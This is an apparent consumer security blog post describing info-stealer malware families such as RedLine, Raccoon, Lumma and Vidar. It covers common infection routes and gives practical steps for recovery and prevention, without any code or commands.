Info-Stealer Malware: RedLine, Raccoon, Lumma, and What They Actually Do

Published: 24 April 2026 9 min read By ScanTotal Security Team
Last reviewed: 4 May 2026 by Kumari Rajapaksha — Founder, ScanTotal

There's a category of malware that doesn't announce itself. It doesn't encrypt your files, it doesn't pop up ransom notes, it doesn't slow your machine down to a crawl. It runs for about thirty seconds, uploads a bundle of data to a server somewhere, and quits. Two weeks later, your email is being used to reset somebody else's bank password, or your Steam library is gone, or your crypto wallet is empty — and you have no idea when it started.

That category is called an info-stealer, and in 2026 it's the most common malware people actually encounter. It's not the flashiest threat. It's just the one most likely to hit you.

This post walks through what info-stealers do, the biggest families circulating right now, how people get infected, and what to do if you think a machine of yours has been hit.

Info-stealer infection chain A four-step horizontal flow: delivery via cracked software or fake installer, execution by the user, collection of saved credentials and wallets, and exfiltration to attacker servers — typically within one minute. 1 Delivery Cracked software, malicious search ad, fake CAPTCHA 2 Execute User runs the file or pastes the PowerShell command 3 Collect Read browser passwords, cookies, crypto wallets, tokens 4 Exfiltrate Bundle as “log”, upload to attacker, delete tracks TIMELINE ~30 sec end to end
An info-stealer's whole job is steps 3 and 4 — read everything sensitive on the machine, ship it to an attacker server, and exit. The whole cycle typically completes faster than the victim notices anything is wrong.

What info-stealers are (and aren't)

An info-stealer is malware whose entire purpose is to take data and leave. A single stealer run typically does something like this:

  1. Executes on the victim's machine after they open a malicious file or paste a command.
  2. Reads every installed browser's saved password store, cookie jar, autofill data, and history.
  3. Reads common crypto wallet files (Exodus, Electrum, MetaMask extension data, etc.).
  4. Reads tokens for Discord, Steam, Telegram, and similar apps.
  5. Takes a screenshot of the desktop.
  6. Bundles everything into a ZIP or similar archive — this is called a "log".
  7. Uploads the log to the attacker's server.
  8. Exits, often deleting its own files.

The whole process usually takes less than a minute. Unlike ransomware, the malware wants to stay undetected — the longer the victim doesn't notice, the more value the stolen session tokens retain. There's no ransom note because there's no negotiation. The data is already gone.

Logs get sold on criminal marketplaces within hours. A single log might go for a dollar or two. The buyer isn't the person who infected you — they bought access to your digital life from somebody else who did. That separation between infection and exploitation is why the gap between infection and visible consequence can be weeks or months.

The dominant families in 2026

Info-stealers operate mostly as Malware-as-a-Service: the developers rent their malware to affiliates who run the actual campaigns. That model means any given family has dozens of active operators at any moment, which is why these names have stayed prominent even as individual campaigns come and go.

RedLine

First seen: 2020 · Primary target: Windows · Distribution: MaaS

Probably the most widely-distributed stealer of the last five years. Written in .NET, sold via Telegram channels, and notorious for being absurdly easy to operate. RedLine harvests browser credentials, cookies, autofill data, crypto wallets, and Discord/Telegram sessions. Typically arrives via fake cracked software, fake installers advertised on YouTube, or attachments in phishing emails. Its stealer logs have been found in practically every criminal marketplace since 2021.

Raccoon Stealer

First seen: 2019 · Primary target: Windows · Distribution: MaaS (v2 active)

Raccoon had a public takedown in 2022 when its main operator was arrested, but a second version appeared within months and has been active since. Focuses on browser credentials and crypto wallets with a particular emphasis on Chromium-based browsers. Commonly bundled inside fake installers for productivity tools — PDF readers, archive utilities, video players — that users search for when avoiding official downloads.

Lumma Stealer

First seen: 2022 · Primary target: Windows · Distribution: MaaS

One of the fastest-growing stealers in 2024-2026. Notable for being deliberately engineered to evade detection and for its support for grabbing session tokens from a long list of applications, not just browsers. Often delivered through fake CAPTCHA pages — a growing trend in 2026 — that instruct users to open Windows Run and paste a command, which pulls down and executes the stealer in a single step.

Vidar

First seen: 2018 · Primary target: Windows · Distribution: MaaS

A veteran of the space, Vidar is often used as a second-stage payload: another malware family infects the machine, then pulls in Vidar to do the actual data theft. Has particular strength in harvesting 2FA app data and authentication apps that store tokens in readable form. Known for using legitimate services (Telegram channels, Steam profile pages) to host its command-and-control configuration, which frustrates simple domain-blocking defences.

Other active families worth knowing by name: StealC (rising fast through 2025), Meduza, Rhadamanthys, and Atomic Stealer (the dominant macOS stealer, often bundled with fake video-conferencing or creative-tool installers). The total count of distinct stealer families is well over fifty; these are the ones most frequently seen in consumer-facing infections.

How people actually get infected

Info-stealer infections in 2026 almost always start with the victim executing the payload themselves. The delivery mechanisms that produce most of the volume:

Cracked software and game cheats

The single biggest infection vector for consumer machines. Somebody searches for "Photoshop 2026 crack" or "free Fortnite cheat", downloads an archive from a forum or random site, extracts it, and runs the installer. Half the time the cracked software doesn't even exist — the whole download was a wrapper around a stealer. This vector has been the same for over a decade, and it hasn't lost effectiveness.

Malicious ads in search results

Attackers buy search ads for popular software — "Notion", "OBS Studio", "WinRAR", "Discord download" — using domains that look convincing. The ad shows above the real result. Users click, land on a page that clones the real software site, and download an installer that installs the real software along with a stealer. The software actually works, so nothing seems wrong.

Fake CAPTCHA / fake error pages

A newer vector that exploded in 2024. Compromised websites show a fake "verify you're human" page that instructs the user: "Press Windows + R, press Ctrl + V, press Enter." What they've copied to the clipboard is a PowerShell command that downloads and runs a stealer. The user follows the instructions because the page looks like a normal security check. This vector has been linked to Lumma, Vidar, and StealC campaigns.

Phishing emails with attachments

Invoices, shipping notifications, job-offer documents. The attachment is usually a password-protected archive (to evade gateway scanning) with the password in the email body. Once extracted, the contents are an executable disguised as a PDF or Word document, often using unicode trickery in the filename. This vector is less common than cracked software for consumers but dominates business-targeted infections.

Trojanised YouTube tutorials

"How to get X for free" videos with a download link in the description. The link goes to a free file-host with a password-protected archive. This vector is disproportionately popular with younger users who encounter it while looking for free versions of paid tools.

What to do if you think you've been hit

The assumption to start from: every password saved in any browser on that machine is compromised. Every active session — email, banking, social media, crypto exchanges — is compromised. Every password-manager master password, if typed on that machine, is compromised.

The response, in order:

  1. Move to a different, clean device for the next steps. Don't try to change passwords from the machine that might still be infected.
  2. Change passwords on the high-value accounts first: primary email, password manager (master password), banking, crypto exchanges, any account that holds money or identity. Work through less critical accounts afterwards.
  3. Enable or rotate 2FA on every account that offers it. If you used SMS 2FA, switch to an authenticator app where possible — SMS codes can be intercepted through SIM-swap attacks once the attacker has your phone number.
  4. Sign out of all active sessions in each service's account settings. Stolen session cookies let an attacker skip the password entirely, so rotating passwords without signing out of sessions leaves a huge gap.
  5. Run a full scan on the infected machine with a reputable anti-malware product. Several good options exist — any of the major vendors will catch the common stealer families. If you want certainty, reinstall the operating system from scratch rather than trusting the cleanup.
  6. Notify your bank if banking credentials or sessions were exposed. They can monitor for fraudulent activity and flag the account. The sooner you tell them, the easier any disputed-transaction claim becomes.
  7. Monitor credit reports for the following weeks to months. Stolen identity data often gets used months after the original infection.

Prevention, honestly

Most real-world prevention comes down to four habits, none of which are novel:

  • Download software from official sources. Type the URL or use a bookmark — don't click the top search ad. This alone blocks the two biggest infection vectors.
  • Be sceptical of "paste this command" instructions from any web page, no matter how official it looks. Real error pages never tell you to run PowerShell commands.
  • Keep a current anti-malware product running. The built-in defender on modern Windows and macOS is genuinely competent against the common stealer families; it's not worth turning off for convenience.
  • Don't store passwords in your browser if you can avoid it. A dedicated password manager with a strong master password raises the bar meaningfully — stealers can't decrypt a properly-configured password manager's vault without the master password, which you never type on random machines.

None of this is new. What's new is the sheer volume of stealer infections — AV-TEST and similar labs have reported stealer detections overtaking ransomware, banking trojans, and crypto-miners combined in recent years. The machinery has matured to industrial scale. The defences are the same ones your past self already knew about.

Check a suspicious file or link

Before running that "installer" from a forum — run it through ScanTotal's file and URL scanners first.

Open Scanner

Check any file, link, or message

Free, private scanning across all six tools — no account required.

Open Scanner Read: What Is Malware?

Sources & Further Reading

Related Articles

What Is Malware? A Simple Guide for Beginners
Viruses, trojans, worms, ransomware, and stealers explained plainly.
How to Check If Your Email Has Been in a Data Breach
Check breach databases and take action if your data has been exposed.
What to Do If You Clicked a Suspicious Link
Incident response steps after a suspected exposure.